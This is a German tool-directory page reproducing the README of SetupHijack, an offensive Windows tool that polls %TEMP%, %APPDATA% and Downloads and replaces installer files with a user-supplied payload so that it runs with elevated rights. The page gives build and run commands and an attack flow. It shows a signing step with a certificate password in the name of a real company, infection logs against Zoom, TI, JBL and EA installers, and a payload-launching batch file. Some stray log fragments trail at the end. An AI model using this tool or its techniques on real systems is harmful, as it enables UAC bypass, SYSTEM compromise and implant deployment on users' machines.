Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/hackerhouse-opensource/setuphijack
Privilege EscalationPayload GenerationExploitationLateral MovementPenetration TestingRed Teaming
GitHubhackerhouse-opensource/setuphijack

SetupHijack

SetupHijack is a security research tool that exploits race conditions and insecure file handling in Windows applications installer and update processes.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
26429vor 6 MonatenVon Kitploit geprüft

SetupHijack


Übersicht

SetupHijack ist ein Sicherheitsforschungstool, das Race Conditions und unsichere Dateibehandlung in Windows-Installations- und Updateprozessen ausnutzt. Es zielt auf Szenarien ab, in denen privilegierte Installationsprogramme oder Updater Dateien in %TEMP% oder anderen für alle Benutzer beschreibbaren Orten ablegen, sodass ein Angreifer diese Dateien ersetzen kann, bevor sie mit erhöhten Rechten ausgeführt werden.

  • Benötigt keine erhöhten Berechtigungen zur Ausführung.
  • Verwendet keine Dateisystembenachrichtigungen (pollt stattdessen auf Änderungen).
  • Nutzt Schwachstellen in der Authenticode-Codesignierung und in den Vertrauensmodellen von Installationsprogrammen aus.
  • Kann .exe, .msi und Batch-Dateien (z. B. sysinfo, netstat, ipconfig) infizieren.
  • Nur für Red Teaming, Penetrationstests und Sicherheitsforschung gedacht.

Der beabsichtigte Verwendungszweck dieses Tools ist es, im Hintergrund auf einem kompromittierten Benutzerkonto mit Berechtigungen zu laufen, um einen anderen Prozess durch Hijacking von Installer-/Updater-Dateiabwürfen zu erhöhen.

Das Diagramm unten zeigt reale Beispiel-Anwendungsfälle dieses Exploits in mehreren Szenarien, die für einen UAC-Bypass verwendet werden können. UAC-Bypasses gelten als Sicherheitsgrenze, wenn sie unter Adminless ausgeführt werden, und sind eine häufige "Angreiferanforderung" zum Deaktivieren von Sicherheitskontrollen. Die Ausnutzung privilegierter Administratoroperationen bietet schädlichem Code eine generische Exploit-Zugänglichkeit, um Prozessprivilegien per Side-Loading zu erhöhen oder zu eskalieren. Dieses Tool kann verwendet werden, um weitere Anwendungen zu identifizieren, die denselben Risikoarten ausgesetzt sind; ein Angreifer kann auf die Ausführung dieser Prozesse warten, um erhöhte Rechte zu erlangen, ohne das Nutzerverhalten zu stören.

Diagramm zur Entdeckung von SetupHijack-Schwachstellen

Funktionsweise

  1. SetupHijack durchsucht kontinuierlich %TEMP% (und Unterverzeichnisse) nach neuen oder geänderten Installationsdateien.
  2. Wenn eine Zieldatei erkannt wird, wird sie durch eine vom Benutzer bereitgestellte Payload (EXE, MSI oder BAT) ersetzt, wobei das Original optional als .bak-Datei erhalten bleibt.
  3. Wenn der privilegierte Prozess die ersetzte Datei vor Integritätsprüfungen ausführt, läuft die Payload mit erhöhten Rechten (z. B. SYSTEM oder Administrator).
  4. Das Tool protokolliert alle Aktionen und führt eine Skiplist, um eine erneute Infektion derselben Dateien zu vermeiden.

Hinweis zur Codesignierung

Dieses Projekt verwendet einen gehackten Codesignierungsprozess mit SignToolEx.exe und SignToolExHook.dll, um Payloads und Installationsprogramme zu signieren. Die Verwendung gültiger Codesignierungszertifikate und eines Authenticode-Zeitstempels erhöht die Erfolgsrate beim Umgehen von Installer- und Betriebssystem-Vertrauensprüfungen.


Verwendung

Erstellen```sh

nmake PAYLOAD=c:\Path\to\your\payload.exe

root@kitploit:~
### Ausführen (Optionen)```sh
SetupHijack.exe                  # Scan %TEMP%, %APPDATA%, and %USERPROFILE%\Downloads (default)
SetupHijack.exe -notemp          # Disable scanning %TEMP%
SetupHijack.exe -noappdata       # Disable scanning %APPDATA%
SetupHijack.exe -nodownloads     # Disable scanning %USERPROFILE%\Downloads
SetupHijack.exe clean            # Clean mode (restores .bak backups in all enabled locations)
SetupHijack.exe verbose          # Verbose mode (log all actions)
SetupHijack.exe <payload.exe>    # Use specified payload for .exe (unless argument is a recognized option)
  • Führen Sie SetupHijack.exe vor oder während eines privilegierten Installations-/Aktualisierungsvorgangs aus.
  • Standardmäßig scannt das Tool alle gängigen Ablageorte: %TEMP%, %APPDATA% und %USERPROFILE%\Downloads.
  • Sie können jeden Ort mit den Flags -notemp, -noappdata oder -nodownloads deaktivieren.
  • Das Flag clean stellt Backups an allen aktivierten Orten wieder her. Das Flag verbose protokolliert alle Aktionen.
  • Für die Remote-Privilegienausweitung verwenden Sie es mit shadow.exe oder ähnlichen Tools auf Terminal Services.

Beispiel-Angriffsablauf

  1. Erstellen Sie Ihre Payload und SetupHijack: ```sh nmake PAYLOAD=c:\Users\YourUser\Desktop\payload.exe
    root@kitploit:~
  2. Starte SetupHijack: ```sh SetupHijack.exe
    root@kitploit:~
  3. Starten Sie den Ziel-Installer oder den Update-Prozess als Administrator.
  4. Wenn der Installer Dateien in %TEMP% ablegt und sie mit erhöhten Rechten ausführt, wird Ihre Payload ersetzt und ausgeführt.

Beispielausgabe

Im Folgenden finden Sie ein reales Beispiel für das Erstellen und Ausführen von SetupHijack, einschließlich Code-Signierung und Infektionsausgabe:``` C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>nmake PAYLOAD="C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe"

Microsoft (R) Program Maintenance Utility Version 14.29.30159.0 Copyright (C) Microsoft Corporation. All rights reserved.

root@kitploit:~
    powershell -Command "(Get-Content SetupHijack.cpp) -replace '#define PAYLOAD_PATH L\".*\"', '#define PAYLOAD_PATH L\"%ESCAPED_PAYLOAD%\"' | Set-Content SetupHijack.cpp"
    cl /nologo /W4 /EHsc /DUNICODE /D_UNICODE /MT /O2 /c SetupHijack.cpp

SetupHijack.cpp SetupHijack.cpp(318): warning C4189: 'hr2': local variable is initialized but not referenced taskkill /f /im SetupHijack.exe 2>nul powershell -Command "Start-Sleep -Milliseconds 500" link /nologo /SUBSYSTEM:CONSOLE /ENTRY:wmainCRTStartup /NODEFAULTLIB:MSVCRT /NODEFAULTLIB:MSVCPRT /OUT:SetupHijack.exe SetupHijack.obj kernel32.lib user32.lib shlwapi.lib Shell32.lib /MANIFEST /MANIFESTFILE:SetupHijack.exe.manifest copy /y install.wxs.template install.wxs 1 file(s) copied. powershell -Command "(Get-Content install.wxs) -replace 'Source="PAYLOAD_PLACEHOLDER"', 'Source="%ESCAPED_PAYLOAD%"' | Set-Content install.wxs" wix build install.wxs -o install.msi Generating install.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe Generating launch_payload.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe powershell -Command "(Get-Content install.wxs) -replace '(<File Id="RengeExeFile" Source=").*?(" KeyPath="yes"/>)', '%ESCAPED_PAYLOAD%' | Set-Content install.wxs" call sign_random.bat Using CERT: [certs\rockstar1.pfx] Using PASS: [C!EZxYUxVGPzQDj3] The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: SetupHijack.exe

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0 The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: install.msi

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0

C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>SetupHijack.exe [2025-09-24 15:20:46] [SetupHijack] Using payload: C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe [2025-09-24 15:20:46] [SetupHijack] If infecting .msi, will use: install.msi [2025-09-24 15:20:46] [SetupHijack] Polling enabled locations recursively for .exe, .msi, .bat: [2025-09-24 15:20:46] - C:\Users\FANTAS1\AppData\Local\Temp [2025-09-24 15:20:46] - C:\Users\Fantastic\AppData\Roaming [2025-09-24 15:20:46] - C:\Users\Fantastic\Downloads [2025-09-24 15:20:46] [SetupHijack] Entering infection loop. [2025-09-24 15:20:59] [SetupHijack] Total infections this session: 0 [2025-09-24 15:21:13] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\installcmd.bat with payload install.bat, backup: C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat.bak [2025-09-24 15:21:13] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:22] [SetupHijack] Replaced C:\Users\Fantastic\Downloads\installcmd.msi with payload install.msi, backup: C:\Users\Fantastic\Downloads\installcmd.msi.bak [2025-09-24 15:21:26] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:26] [SetupHijack] Total infections this session: 2 [2025-09-24 15:21:41] [SetupHijack] Replaced C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe.bak [2025-09-24 15:21:41] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:53] [SetupHijack] Total infections this session: 3

root@kitploit:~
## Beispiel für die Verwendung zum Bereitstellen eines Implantats

Unten ist ein Screenshot, der SetupHijack in Aktion zeigt, wie es während eines privilegierten Installationsvorgangs ein Implantat bereitstellt:

![Example Use to Deploy An Implant](https://assets.kitploit.com/production/public/readmes/42886/25e1c4b4b2ca8921509760ae8ddf420a66a13deaed03631c44de618dc668f218.png)

## Sicherheitshinweise

- Dieses Tool ist nur für autorisierte Tests und Forschung bestimmt.
- Die Ausnutzung dieser Schwachstellen kann zu einer vollständigen SYSTEM-Kompromittierung führen, wenn sich der Benutzer in der Administratorgruppe befindet.
- Installationsprogramme können Hash-/Signaturprüfungen verwenden, die diesen Angriff blockieren, aber viele tun dies weiterhin nicht.
- Verwenden Sie es immer in einer kontrollierten Umgebung.
- Wenn Sie mit diesem Tool eine CVE entdecken oder ein Bounty erhalten, geben Sie uns Anerkennung!

Das gezielte Anvisieren eines einzelnen Verzeichnisses (z. B. `%TEMP%`) kann die Wahrscheinlichkeit erhöhen, eine Time-of-Creation/Time-of-Use-Race-Condition (TOCTOU) zu gewinnen, da ein schnelleres Abfragen und weniger Konkurrenz ermöglicht wird. Für maximale Zuverlässigkeit führen Sie mehrere Instanzen von SetupHijack aus, die jeweils auf ein einzelnes Verzeichnis ausgerichtet sind. Für optimale Ergebnisse stellen Sie sicher, dass Ihre Nutzlast (die EXE, die Sie mit erhöhten Rechten ausführen möchten) ein Manifest enthält, das eine Erhöhung anfordert (requireAdministrator), und mit einem gültigen Code-Signatur-Zertifikat signiert ist, das einen Authenticode-Zeitstempel enthält. Dies erhöht die Chance, Installations- und OS-Vertrauensprüfungen bei Installationsprogrammen zu umgehen.

## Identifizierte Schwachstellen

Die folgende nicht erschöpfende Liste wurde mit den "Best-Case-Szenarien" identifiziert, bei denen nicht vertrauenswürdige .MSI-Dateien zu "NT AUTHORITY\SYSTEM" führen, aber viele "UAC-erhöhte"
Prozesse laufen oft über .bat-Dateien. Da die Ausführung unter derselben Benutzer-SID erfolgt, da %TEMP% für die Benutzer-SID eindeutig ist, die unter %USERPROFILE%
als Teil der internen Sitzungserstellung erstellt wird, können Sie innerhalb von Befehlen derselben Sitzung auf hohe Integrität und volle Berechtigungen eskalieren, indem Sie .bat-Dateien manipulieren, die
Rechte des übergeordneten Prozesses erben. "Temporary File Elevated Command Execution" ist ein häufiger Befund – der für UAC-Bypass und Ausführung ohne Administratorrechte als Benutzer
verwendet werden kann, wobei die Eingabeaufforderung auf dem sicheren Desktop die ausgenutzte Anwendung anzeigt (z. B. ein Zoom-Update).

- Zoom 6.6.1 (15968) verwendet %AppData% für die Installation und Updates von .exe, was laterale Prozessbewegungen und
  Prozess-Spoofing ermöglicht (z. B. Elevation-Anfrage von Zoom-Update senden). Exe-Dateien können leicht manipuliert werden,
  für Credential-Stealing-Angriffe und bösartige Zwecke.```
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\airhost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\aomhost64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptControl.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptHost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptInstall.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptService.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomDocConverter.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomHybridConf.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookIMPlugin.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom_launcher.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zTscoder.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zUpdater.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zWebview2Agent.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\uninstall\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\ZoomDownload\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
  • msiexec.exe führt bei Ausführung von install.msi unter NT AUTHORITY\SYSTEM aus

  • Wireshark-Update-EXE kommt über %Temp%, hat die Race nicht gewonnen.

  • Visual-Studio-Code-Signaturprüfungen bei Updates verhindern die Ausnutzung, (leicht getestet .VSIX)

  • Texas Instrument Code Composer Installer kann für einen UAC-Authentifizierungs-Bypass ausgenutzt werden (09/25/2025). (ccs_setup_20.3.0.00014.exe)``` [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 2 [2025-09-25 14:39:59] [SetupHijack] New infections this run: 5 [2025-09-25 14:40:02] [SetupHijack] Total infections this session: 13 [2025-09-25 14:40:29] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\tmp1758829228.bat.bak [2025-09-25 14:40:29] [SetupHijack] New infections this run: 1

root@kitploit:~
- Cursor IDE wurde dabei beobachtet, wie es .bat-Dateien und den Befehlsverlauf in %TEMP% erstellt, die ausgenutzt werden können, um
  Befehle in den Cursor-Verlauf einzuschleusen, mit eingeschränkter Rechteerweiterung. 


- JBL Quantum Engine enthält eine (inzwischen gepatchte) Command-Injection-Schwachstelle, die "net" (einschließlich .bat) aus dem
  selben Verzeichnis ausführt, aus dem JBL_QuantumENGINE_1.11.0.1511_x64 ausgeführt wird. Die neueste Version verwendet einen neuen Installer, der
  für diese spezifische Command-Injection-Schwachstelle nicht anfällig ist (JBL_QuantumENGINE_Installer_2.2.13_x64.exe). Dieses
  Problem wurde im November 2022 als 0day entdeckt. Es kann verwendet werden, um UAC-Einschränkungen zu umgehen und erweiterte 
  Administratorrechte zu erlangen. Der SYSTEM-Dienst schreibt bat-Dateien unter %TEMP% für Debugging/Diagnosezwecke. ;-)```
C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>type net.bat
@echo off
REM install.bat - runs the payload for SetupHijack
start "" "c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe"

C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>dir JBL_QuantumENGINE_1.11.0.1511_x64.exe
 Volume in drive C has no label.
 Volume Serial Number is 48EC-B703

 Directory of C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day

11/20/2022  11:54 AM       139,327,096 JBL_QuantumENGINE_1.11.0.1511_x64.exe
               1 File(s)    139,327,096 bytes
               0 Dir(s)  237,500,821,504 bytes free
  • EA Sports "EA Anti-Cheat Installer" Beliebige Befehlsausführung mit erhöhten Rechten. EA-Titel wie "skate." installieren einen Anti-Cheat-Dienst, der einen temporären und vom Benutzer beschreibbaren Speicherort nutzt. Ein Angreifer kann die EAAntiCheat.Installer.exe während der STEAM-Installation ersetzen, und eine UAC-Eingabeaufforderung erscheint von der STEAM-Engine, mit Valve-Logo und -Symbol, aber Ihre Payload-EXE wird mit erhöhten Rechten ausgeführt. Siehe EASkateUAC-Screenshots zur Verwendung bei UAC-Bypass(Verwirrung?)-Angriffen.``` Directory of C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat

09/29/2025 04:34 PM

. 09/29/2025 04:13 PM .. 09/29/2025 04:31 PM 166,999,232 EAAntiCheat.Installer.exe 1 File(s) 166,999,232 bytes 2 Dir(s) 161,991,856,128 bytes free

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>cacls EAAntiCheat.Installer.exe C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat\EAAntiCheat.Installer.exe BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F WIN11LAB\Fantastic:(ID)F APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>copy c:\Users\Fantastic\Documents\Work\EA\launch_demo.exe EAAntiCheat.Installer.exe Overwrite EAAntiCheat.Installer.exe? (Yes/No/All): A 1 file(s) copied.

root@kitploit:~
# Lizenz

Diese Dateien sind unter der 3-Klausel-BSD-Lizenz verfügbar.
Tool herunterladen
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\tmp1758829228.bat with payload install.bat, backup: C:\Users\FANTAS